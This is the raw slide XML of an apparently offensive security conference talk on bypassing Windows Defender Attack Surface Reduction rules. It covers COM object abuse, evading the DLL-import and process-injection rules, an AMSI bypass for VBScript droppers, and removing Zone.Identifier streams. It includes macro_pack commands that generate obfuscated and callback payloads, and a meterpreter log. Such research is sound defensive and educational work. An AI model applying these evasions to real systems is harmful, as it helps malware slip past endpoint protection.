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89" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="286" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="303" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="299" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="285" r:id="rId25"/>
    <p:sldId id="300" r:id="rId26"/>
    <p:sldId id="274" r:id="rId27"/>
    <p:sldId id="271" r:id="rId28"/>
    <p:sldId id="290" r:id="rId29"/>
    <p:sldId id="304" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="275" r:id="rId32"/>
    <p:sldId id="283" r:id="rId33"/>
    <p:sldId id="276" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="279" r:id="rId37"/>
    <p:sldId id="305" r:id="rId38"/>
    <p:sldId id="287" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="280" r:id="rId41"/>
    <p:sldId id="307" r:id="rId42"/>
    <p:sldId id="306" r:id="rId43"/>
    <p:sldId id="308" r:id="rId44"/>
    <p:sldId id="302" r:id="rId45"/>
    <p:sldId id="2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4B05-609C-4C61-8F74-FFB2912CE0EB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CFF7-751B-4323-B549-8E18C12D8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CFF7-751B-4323-B549-8E18C12D8A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2950-8DE8-43DA-B93F-EDD40DAB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42A11-4E69-4672-85B1-D0090478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0A69-841D-42AB-8F8B-178FB1F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A2B1-CB74-49D8-B37A-946C1A99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EB69-67CB-4C26-9CC0-A3A52958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E522-AA02-438F-ADA0-0737A746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8EF2-2FC8-42EB-8D5A-9F002A77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53D5-E7FC-41C2-8EB4-91FD98C2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FD91-F16C-406E-B863-109C5116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92BC-65D0-422B-83C9-C32242D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C527-D089-478B-ACC9-254DB6CF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9936D-754B-4F61-B338-A57A7A1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1EEC-83CB-467D-84FC-2733BEA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6508-508B-4E09-BEC4-E2D4424A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58E9-4CF9-4B12-9C4E-2830EA71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47EF-E04E-4565-8220-D790BF1C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80DE-5586-4500-818B-91625C60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D572-1CF3-4020-B7AB-292D7B9A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54F5-B868-43D1-B2C4-CB565163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9745-0AA3-4221-A5AF-17F0211A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F5B4-C205-4CD3-90C8-EBCF27D6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2A0D-253D-47E7-9980-32F16C46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1579-EF7F-491E-BD4F-D67ABA95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46E4-3F5E-4C3D-809F-9FDAB72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DC71-6F7E-4CAE-BBC4-D73B936B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C006-D042-41D7-967B-AC6DD45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73C9-7065-40A0-8736-00D196DD9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33F93-1D06-4DE1-93B8-A4E3583B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EF356-6C1D-4E6F-AB10-45B2DB9E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3386-02FB-41F2-81EB-9B973741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940F-7DE3-40DE-8FF4-9234527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D890-07C9-4B4D-BA8F-97AA73ED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2065-3AEE-49BB-A9CE-5A6F11629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5CA0-9135-4CB3-A3A0-FA5799CA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5C930-90D7-4765-A2F3-EF3FED9A9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EB57-7570-4393-BA40-F20DB4658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15DBA-58C3-4A8F-B013-1A29514F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3F9D6-DFAA-4E6A-B918-A91C87D0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16B5-1C08-4576-902D-7597149F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3E5B-1A77-4D94-8D94-D2DCFAE6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ED535-0DBF-4BCB-BA2E-671EA287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A0DD-7DDD-4868-A6E4-758D164B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C5319-1569-4DDC-913A-97BFC3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DE7E-9770-4189-8458-03DC9A28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B820-8922-4F99-A377-9786C8C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E83AB-8D0B-44A2-B55F-AA4C8CA0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B9E-74F6-4E2E-8B12-BEC6666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F1BF-8549-4A4E-8DA8-159A2751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6AA1-69C8-4F85-A3B3-FC64D286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672F-74F4-4BF4-BC50-76815DF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129C9-5579-4A2D-BD83-FC7BE1E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8D52-4CBE-4DAF-818B-F2928954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5B73-E575-4488-9056-61CE7F2E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27D6A-A27F-4BF2-8E07-B68EE691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92469-851A-4D9F-9151-645204C9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68CF-B625-4B3E-A7A8-E8BA5171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C9CCA-E10E-4DF3-9259-E8F9010B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D261C-BD80-4CD4-988A-5518287B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4A84A-5440-4ECD-8020-69A10151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A44E-5BE7-4B6C-A581-3C9A669A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754C-743D-449F-A42E-5E8C03D6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E6C0-901F-4215-82E3-BEB95288E1E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477B-4F58-4DA5-A6F9-14F47F32F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CF2A-9E89-4C4B-8DEB-66FBC5582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3C0E-DF4B-429F-AA61-E09719A45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rkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-ru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4C33-C20E-455C-9D28-FC0B5DAF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63538"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bypass Windows Defender Attack Surface Reduction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BC3235-1818-4E74-B375-5AE3764899AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906556" y="5710336"/>
            <a:ext cx="254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OffensiveCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2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13651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bypass via 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AF4-3C16-42B3-A62E-FBB04848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000"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bypass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en-US" dirty="0"/>
              <a:t>D4F940AB-401B-4EFC-AADC-AD5F3C50688A </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Blocked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by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en-US" dirty="0"/>
              <a:t>26190899-1602-49e8-8b27-eb1d0a1ce869 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5E89585D-67E5-414B-AAE6-97AA477D20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45740"/>
            <a:ext cx="803328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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91DCF80-1CD0-419E-B141-C48405958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98319"/>
            <a:ext cx="6944360" cy="3531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scheduler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E7D9-9DC9-4347-BADC-BA1CECA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2120" y="1940561"/>
            <a:ext cx="5176520" cy="1036319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bypass all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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6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COM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>objects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E7D9-9DC9-4347-BADC-BA1CECA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9726227" cy="4319495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two conditions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have an interesting method (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>ShellExecute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Be loaded via another executable (LocalServer32 registry key must be set).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PowerShell script to enumerate interesting com objects to bypass  ASR and other security mechanisms.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0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ShellWindows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> COM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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834A971-822E-4EAF-9D4E-FCCDE7ED11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18805"/>
            <a:ext cx="7962601" cy="636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E3334-CC6B-42F3-8716-5B90BA27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5623"/>
            <a:ext cx="8494309" cy="27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custom COM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>object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E7D9-9DC9-4347-BADC-BA1CECA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428999"/>
            <a:ext cx="11450097" cy="3038669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR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Possible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registry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sz="2800" dirty="0"/>
              <a:t>Note: Com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>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also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!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E715B0E6-922E-4DBA-8847-103758761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6781747" cy="3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8883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Block Office applications from creating executable content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0AAFA9-8B28-40BD-BFFF-118DE8289D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="195229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3B576869-A4EC-4529-8536-B80A7769E899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Trigger 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AF4-3C16-42B3-A62E-FBB04848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an office application from saving an executable file or a script on the filesystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection is based on extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>n VBA dropper the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>saveas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” instruction is blocked:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dropping a file with .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> extension -&gt; Blocked by ASR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dropping a file with .exe extension -&gt; Blocked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>by Office VBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMSI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0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Bypass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AF4-3C16-42B3-A62E-FBB04848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bypass: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68BD0-04EF-4111-8048-641F72B6F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8479" y="2347732"/>
            <a:ext cx="8195042" cy="38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Win32 API calls from Office macro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493F5-1E5C-473C-9283-9B2741AEDD1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69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31B70-DED5-4F7D-9AD2-B29A1B23E78B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="142907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92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B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493F5-1E5C-473C-9283-9B2741AEDD14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1900238"/>
            <a:ext cx="10515600" cy="269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“Block Office files that contain macro code capable of importing Win32 DLLs.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Office files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>loading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Win32 DLL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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>If an Office file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enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, macro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but file canot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E3C8-6572-4AF9-BCD1-B692B496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 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CBFF-CE84-434F-B315-AC676E7E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EmericNasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>blog.sevagas.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sevagas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macro_pack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Personal research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OK lets dive in! (30 minutes and 45 slides yeah!)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6E903E-3950-40D9-91BD-4C51378F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90" y="258224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rule</a:t>
            </a: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00865E8A-00A5-47E9-ABC2-C9C9B9DDE9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9492"/>
            <a:ext cx="8272975" cy="25634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493F5-1E5C-473C-9283-9B2741AEDD1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69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8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Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>rule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E7D9-9DC9-4347-BADC-BA1CECA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428999"/>
            <a:ext cx="11450097" cy="3038669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Probably based on a blacklist of Win32 DLL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The loaded DLL doesn’t  need to have “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” extension</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/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178D3235-8785-4368-9D3A-331E4610D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8103803" cy="2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Block Office app process injection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5D902-8FF5-44C4-9A04-03942979661B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="169068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75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84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3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Trigger rule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493F5-1E5C-473C-9283-9B2741AEDD14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2285493"/>
            <a:ext cx="10515600" cy="2693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3000" dirty="0" err="1"/>
              <a:t>Generate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1"/>
              <a:t>sample</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>echo 10.2.2.60  8080 | macro_pack.py –t WEBMETER –G webmeter.pptm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3100" dirty="0"/>
              <a:t>Trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> &gt; migrate 5504</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[*] Migrating from 7632 to 5504...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[-] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>core_migrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>: Operation failed: Access is denied.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0E4-BC58-4406-A559-9B3B83BC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Bypass rule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493F5-1E5C-473C-9283-9B2741AEDD14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2285493"/>
            <a:ext cx="10515600" cy="26931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?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Current Office application process is not concerned by the rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Want a background session? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spawn another hidden instance of office and run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This can be done with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>macro_pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “-background” option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> possible to drop a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>payload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concerned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (ex. HTA file).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JavaScript or VBScript from launching downloaded executable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3E913-7A72-4D4A-8E14-46A7B96465F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="190023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D3E037E1-3EB8-44C8-A917-57927947596D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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79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rule?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5578590E-C9A2-4094-B339-33732ABC34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29977"/>
            <a:ext cx="7009660" cy="3427950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BE9A5C2A-AF41-4384-993B-6F39BAE60B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2731" y="3048483"/>
            <a:ext cx="3617211" cy="18608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7A35E9-9574-4C9E-B2A3-D2D8CFFB0AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199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blocked by ASR but by AMSI!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86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7863-7268-44C4-83D6-3553F758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AMSI bypass tip </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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05B95108-0CA2-480E-9B79-383F06EAA8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5449" y="4068332"/>
            <a:ext cx="8168793" cy="10262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B4308-FAEE-4A76-9EF5-4FA79F949287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2034466"/>
            <a:ext cx="10515600" cy="443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How to bypass AMSI in VBScript dropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46FE9770-ED73-4E20-B8C9-66CDC8D024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1163" y="2478349"/>
            <a:ext cx="6592410" cy="102198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7142343-C925-4AAD-B4E8-6BF1A71154F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9424242" y="2826206"/>
            <a:ext cx="798990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F20808-4B07-4A81-98B2-A5B54F14A7A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9424242" y="4185246"/>
            <a:ext cx="798990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53452D-C8D5-46FB-9217-02B6FF291A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10312008" y="2829687"/>
            <a:ext cx="2254929" cy="443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Blocked</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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CE851E-246D-418C-BE2D-DF67B8046F5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10312007" y="4179688"/>
            <a:ext cx="2254929" cy="443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Bypass!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2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rule!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7A35E9-9574-4C9E-B2A3-D2D8CFFB0AAE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421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How to trigger the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zone.Identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Alternate Data Stream </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zone.Identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ADS file  not created by classic methods such as MSXML2.ServerXMLHTTP.6.0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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malwares</a:t>
            </a:r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57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Bypass rule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7A35E9-9574-4C9E-B2A3-D2D8CFFB0AAE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421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bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>You can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ADS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>move  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>  %temp%\tmpfile.dat </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>type %temp%\tmpfile.dat &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>file_path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del %temp%\tmpfile.dat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6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C60D-0CC7-4341-B57D-3C006EDA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Attack Surface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A63A-396C-4AED-98FA-C196CAD3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as part of Windows defender exploit guard in Windows 10 1709.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>A s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>et of rules (Group Policy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> efficient:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x: Block all Office applications from creating child processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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99.9% macro based droppers found in the wild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talk: “Stagecraft of Malicious Office Documents – A look at Recent Campaigns”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execution of potentially obfuscated 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2957A-AF7B-439D-8409-74B22FFA2004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="190023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5BEB7EFE-FD9A-4556-801D-275E5FFC04CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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macro_pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>echo "C:\windows\system32\cmd.exe /C calc.exe" | macro_pack.py -t CMD  -o -G playcmd_obf.vbs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 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6575EEAF-17AA-4D3F-86E1-07D0681E6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5063" y="3357979"/>
            <a:ext cx="9301874" cy="24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Trigger rule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Could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> not trigger the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….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public encoder for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VBscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
